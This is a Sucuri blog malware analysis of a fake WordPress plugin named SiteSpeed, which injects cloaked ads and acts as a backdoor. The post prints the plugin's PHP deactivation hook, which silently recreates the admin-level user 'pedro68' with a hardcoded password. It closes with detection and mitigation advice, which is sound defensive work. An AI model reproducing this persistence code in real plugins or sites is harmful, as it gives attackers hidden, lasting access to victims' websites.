• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
Fake WordPress Plugin SiteSpeed Hosts Malicious Ads & Backdoors

Fake WordPress Plugin SiteSpeed Serves Malicious Ads & Backdoors

July 16, 2020Krasimir Konov

FacebookTwitterSubscribe

Fake WordPress plugins appear to be trending as an effective way of establishing a foothold on compromised websites.

During a recent investigation, we discovered a fake component which was masquerading as a legitimate plugin. Named SiteSpeed, it contained a lot of interesting malicious capabilities.

Unwanted Advertisements

The malicious plugin can be used by the attacker to display ads on the website. To avoid detection and target specific website visitors, the plugin has many functions to check the user-agent, referrer, and the IP of the user accessing the page. If a search engine is detected, then the ads will not be displayed — only regular users will see the advertisements from the website pages.

Backdoor Functionality

One interesting technique that this plugin leverages is revealed upon deactivation. If a website administrator decides to deactivate SiteSpeed from the WordPress website, the fake component executes a couple of malicious tasks to maintain unauthorized access.

Let’s take a look at the contents of sitespeed.php to see how it accomplishes backdoor functionality. We found this malicious file located within the plugins /wp-content/plugins/sitespeed/ directory.

function sitespeed_deactivate() {
    global $wpdb;

    $charset_collate = $wpdb->get_charset_collate();
    
    $table_name = $wpdb->prefix . "sitespeed";
    $sql = "DROP TABLE $table_name";
    $wpdb->query( $sql );
    
    $table_name = $wpdb->prefix . "sitespeedban";
    $sql = "DROP TABLE $table_name";
    $wpdb->query( $sql );
    
    $user_name = 'pedro68';
    $user_id = username_exists( $user_name );
    if ( $user_id ) {
        wp_delete_user($user_id, 1);
    }
    wp_create_user( $user_name, 'zhano', $user_name . rand(1,10000) . rand(1,10000) . '@mailinator.com' );
    
    delete_option( 'ads_enable' );
}

if(function_exists('register_activation_hook')) {
    register_deactivation_hook( __FILE__, 'sitespeed_deactivate' );
}

First, the code checks for the existence of the username “pedro68” and removes it, reassigning all posts to the user_id = 1.

What this means is that, if malicious spam content has been injected by the attacker at any point post-compromise, those posts would still be on the website and appear under whichever user is assigned ID 1 ⁠— unless changed from default, this is ID typically associated with an initial administrative account, since IDs are assigned in a linear fashion.

Role Creation

Another interesting functionality includes role creation. By leveraging the wp_create_user() function, attackers create the user “pedro68” with the password “zhano” and a random email address containing digits:

wp_create_user( $user_name, 'zhano', $user_name . rand(1,10000) . rand(1,10000) . '@mailinator.com' );

Conclusion & Mitigation Steps

Hackers want to maintain unauthorized access for as long as possible, and they have a large number of tricks that they use to accomplish this.

Since malware can hide just about anywhere, it’s always worth checking your website’s plugins, existing users, theme files, or any other third-party extensible components for any indicators of compromise. You might just find an extra plugin that you don’t remember installing on your website which is acting as a backdoor.

Compromised websites can be used for a myriad of other malicious activities as well, ranging from DDoS and brute force attacks to spam mailings or malware distribution. Monitoring for access to your WordPress website, unauthorized user creation, and changes to active plugins are a great way to mitigate risk and detect a compromise.

To prevent infection, consider using a web application firewall to restrict unauthorized access and mitigate risk to your website.

FacebookTwitterSubscribe

Categories: Sucuri Labs, Website Security, WordPress SecurityTags: Black Hat Tactics, Conditional Malware, Hacked Websites, Malvertising, WordPress Plugins and Themes

About Krasimir Konov

Krasimir Konov is Sucuri's Malware Analyst who joined the company in 2014. Krasimir's main responsibilities include analyzing malicious code, signature creation and documentation of malware. His professional experience covers more than 10 years in the IT field, with nine years involved in IT/cyber security. When he’s not analyzing malware or writing Labs notes, you might find Krasimir riding his motorcycle and traveling the world. Connect with him on Twitter or LinkedIn.

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.